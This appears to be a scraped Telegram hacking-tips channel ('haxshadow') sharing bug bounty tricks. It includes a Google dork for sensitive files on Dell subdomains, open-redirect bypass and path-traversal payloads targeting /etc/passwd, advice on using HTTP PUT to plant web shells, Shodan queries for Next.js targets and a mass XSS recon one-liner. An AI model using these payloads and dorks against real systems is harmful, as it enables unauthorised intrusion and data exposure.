haxshadow

try this google dork to find senstive files on website:

site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

👍14🤣3🤔1

2.85K views15:27

haxshadow

you can try this effective manual openredirect Bypass:

1. Null-byte injection:
   - /google.com%00/
   - //google.com%00

2. Base64 encoding variations:
   - aHR0cDovL2dvb2dsZS5jb20=
   - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   - //base64:d3d3Lmdvb2dsZS5jb20=/

3. Case-sensitive variations:
   - //GOOGLE.com/
   - //GoOgLe.com/

4. Overlong UTF-8 sequences:
   - %C0%AE%C0%AE%2F (overlong encoding for ../)
   - %C0%AF%C0%AF%2F%2Fgoogle.com

5. Mixed encoding schemes:
   - /%68%74%74%70://google.com
   - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   - //base64:%2F%2Fgoogle.com/

6. Alternative domain notations:
   - //[email protected]/
   - //127.0.0.1.xip.io/
   - //0x7F000001/ (hexadecimal IP)

7. Trailing special characters:
   - //google.com/#/
   - //google.com/;&/
   - //google.com/?id=123&//

8. Octal IP address format:
   - https://0177.0.0.1/
   - https://00177.0000.0000.0001/

9. IP address variants:
   - https://3232235777 (decimal notation of an IP)
   - https://0xC0A80001 (hex notation of IP)
   - https://192.168.1.1/

10. Path traversal with encoding:
    - /..%252f..%252f..%252fetc/passwd
    - /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    - /..%5c..%5c..%5cwindows/system32/cmd.exe

11. Alternate protocol inclusion:
    - ftp://google.com/
    - javascript:alert(1)//google.com

12. Protocol-relative URLs:
    - :////google.com/
    - :///google.com/

13. Redirection edge cases:
    - //google.com/?q=//bing.com/
    - //google.com?q=https://another-site.com/

14. IPv6 notation:
    - https://[::1]/
    - https://[::ffff:192.168.1.1]/

15. Double URL encoding:
    - %252f%252fgoogle.com (encoded twice)
    - %255cgoogle.com

16. Combined traversal & encoding:
    - /%2E%2E/%2E%2E/etc/passwd
    - /%2e%2e%5c%2e%2e/etc/passwd

17. Reverse DNS-based:
    - https://google.com.reverselookup.com
    - //lookup-reversed.google.com/

18. Non-standard ports:
    - https://google.com:81/
    - https://google.com:444/

19. Unicode obfuscation in paths:
    - /%E2%80%8Egoogle.com/
    - /%C2%A0google.com/

20. Query parameters obfuscation:
    - //google.com/?q=https://another-site.com/
    - //google.com/?redirect=https://google.com/

21. Using @ symbol for userinfo:
    - https://admin:[email protected]/
    - https://@google.com

22. Combination of userinfo and traversal:
    - https://admin:[email protected]/../../etc/passwd

Another SITE

Home - Another SITE

Embrace Life’s Journey with Us About Read About Travel Embark on a journey of discovery with our travel content, where every destination is a story waiting to be told. From the sun-kissed shores of exotic beaches to the charming cobblestone streets of historic…

👍8❤2

3.53K views05:49

haxshadow

always check endpoints

❤15👍3🔥3👏3

3.1K views07:36

haxshadow

Triaged P1 and huge impact

hashtag#bugbountytip
check all the time allowed HTTP method
====>

Using HTTP method PUT
==>
Attacker can create or modify files in this directory without providing any type of authentication.
==>
Attacker may can create Web Shell in this directory And open Backdoor and Run RCE

Using HTTP method DELETE
==>
Attacker can Delete any file on that directory and that
sometime Lead to Take Down The Host

👍7❤4🔥3

3.12K views14:03

haxshadow

Nest.js with ssrf...coming soon

🔥14

3.03K views14:40

haxshadow

How to Find SSRF Vulnerabilities in Next.js | Bug Bounty Hunting POC
https://youtu.be/80MF5blHO6w?si=21o4mwRlSjt5pMxg

😍16😭9❤2👎1🔥1

3.49K views15:34

haxshadow

NextJS-Vulnerability.yaml

955 B

// Query //
en.fofa.info : body="/_next/static" && title="Next.js"
publicwww : body="/_next/static" title="Next.js"
shodan : body:"/_next/static" title:"Next.js"

❤9🔥2

3.79K views16:03

haxshadow

image.png

51.7 KB

😢28

3.54K views17:04

haxshadow

image.png

62.9 KB

😢23

3.51K views17:16

haxshadow

how to find ssrf in next.js
What if I put the video on Facebook page?

👍34👎17💩5🔥1

3.46K views04:58

haxshadow

𝐃𝐢𝐝 𝐲𝐨𝐮 𝐤𝐧𝐨𝐰 𝐲𝐨𝐮 𝐜𝐚𝐧 𝐭𝐫𝐢𝐠𝐠𝐞𝐫 𝐚𝐧 𝐗𝐗𝐒 𝐮𝐬𝐢𝐧𝐠 𝐭𝐡𝐞 <potato> 𝐭𝐚𝐠? 😎

Actually...

You can trigger an XSS using 𝐲𝐨𝐮𝐫 𝐧𝐚𝐦𝐞 as a tag

Or your company's name Or any value in fact

👍14👎2🥰1

3.85K views05:06

haxshadow

privit-templat.zip

113.1 KB

hi.. i upload this my privit-pemplat . please everyone support me. and give you love...

3❤77👍6🔥3🤮3👎2🥰2

4.6K views05:21

haxshadow

❤18👍2👎1

4.14K views08:44

haxshadow

Bug Bounty Tips .pdf

18.3 MB

just wow

2👍22❤8🔥5🥰2

4.24K views16:35

haxshadow

i upload this video.. How to ssrf vulnerability in next.js.. Video link:
https://www.facebook.com/share/v/cRfk7SdqbJfCSUR3/

❤14🔥2🥰2👍1

3.58K views12:14

haxshadow

recon.txt

4.3 KB

Well I haven't been posting youtube videos for a while because I've been doing some case studies on Advanced Recon. Because I have been less active online for some reason. Some of my subscribers have said that the file is called Recon.Text. I gave my telegram to give the file to them

❤29👍5🔥4🥰1

3.94K views05:29

haxshadow

XSS from javascript hidden params

assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"

❤8👍4👎4🔥4💩1

3.27K views13:39

About

Blog

Apps

Platform